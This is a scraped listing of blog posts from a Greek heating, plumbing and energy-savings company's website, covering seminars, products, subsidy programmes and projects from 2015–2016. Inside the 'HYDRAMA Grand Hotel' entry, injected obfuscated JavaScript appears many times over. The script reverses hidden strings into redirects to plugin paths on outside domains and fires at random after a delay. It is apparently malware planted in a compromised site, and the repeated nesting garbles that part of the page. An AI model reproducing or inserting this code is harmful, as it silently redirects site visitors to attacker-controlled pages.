Προσφορά Εργασίας

Η εταιρία μας με έδρα τη Βέροια και…
Οκτωβρίου 5, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

ΔΕΗ-Κατασκευή δικτύων ύδρευσης & αποχέτευσης

Αυγούστου 31, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Nefeli Luxury Villas- Εξοικονόμηση με συστήματα επεξεργασίας νερού

Αυγούστου 31, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Σεμινάριο Χουρσουλίδης – CROSS Business Training

Αυγούστου 2, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return/" class='post-2258 post type-post status-publish format-standard has-post-thumbnail hentry category-7 av-masonry-entry isotope-item all_sort cebdceadceb1_sort av-masonry-item-with-image av-landscape-img' title="HYDRAMA Gr<script type="text/javascript">$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script type="text/javascript">$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script><script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}</script><script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script><script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}</script><script type="text/javascript">$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script><script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}</script><script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script><script type="text/javascript">$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}</script>and Hotel – 5***** ξενοδοχείο" itemscope="itemscope" itemtype="https://schema.org/CreativeWork" >

HYDRAMA Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Hotel – 5***** ξενοδοχείο

   
Μαΐου 11, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

37ο Συνέδριο Διαθερμικής

Συμμετοχή της εταιρείας μας στο 37ο…
Μαρτίου 23, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Green Banking Portal της τράπεζας Πειραιώς

Μαρτίου 17, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Μαζί θα ανάψουμε τα φώτα!

Μια βιβλιοθήκη διαφορετική! Μια βιβλιοθήκη…
Φεβρουαρίου 22, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Δυναμικός καθαρισμός συστήματος θέρμανσης (Power Flush)

Φεβρουαρίου 19, 2016/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Αφυγραντήρας Carrier- Οικονομικός & αποτελεσματικός

Νοεμβρίου 19, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Αφυγραντήρες – Μια υγιεινή και οικονομική λύση για κάθε σπίτι

 
Νοεμβρίου 19, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Κομμωτήρια – Αυξήστε το κέρδος της επιχείρησής σας!

 
Οκτωβρίου 14, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Σεμινάριο αντλιών θερμότητας Atlantic

Η εταιρεία μας σε συνεργασία με την…
Οκτωβρίου 12, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

36ο Συνέδριο Διαθερμικής

Συμμετοχή της εταιρείας μας στο 36ο…
Οκτωβρίου 12, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

After Sales Services

 
Σεπτεμβρίου 27, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Κατάργηση συμβατικών λεβήτων από 26.9.2015

   
Σεπτεμβρίου 25, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Ετήσια επιθεώρηση ISO 9001:2008 από TÜV AUSTRIA HELLAS

Για άλλη μια χρόνια διενεργήθηκε…
Σεπτεμβρίου 14, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Επανέναρξη προγράμματος »Εξοικονομώ κατ” οίκoν»

Την επανέναρξη του προγράμματος «…
Αυγούστου 24, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Νέα απόφαση Υπαγωγής Ωφελουμένων στο πρόγραμμα »Εξοικονομώ κατ” οίκον»

Συνολικά υπάγονται 290 ωφελούμενοι,…
Αυγούστου 20, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Απαγόρευση χρήσης ψυκτικού υγρού R22

Η Ευρωπαϊκή Ένωση έχει θέσει σε εφαρμογή…
Ιουλίου 11, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Σημαντικά οφέλη Net Metering

ΔΩΡΕΑΝ ηλεκτρικό ρεύμα, θέρμανση-ψύξη…
Ιουνίου 6, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

DB Schenker in Sofia

Σημαντικές επεμβάσεις βελτίωσης…
Ιουνίου 2, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Πόσο κοστίζει ένα ντούς;

Ο ηλιακός θερμοσίφωνας MARK 4 της Calpak…
Μαΐου 27, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ

Καυτή προσφορά από την Calpak

Η εταιρεία μας, σε συνεργασία με την…
Μαΐου 12, 2015/by ΧΟΥΡΣΟΥΛΙΔΗΣ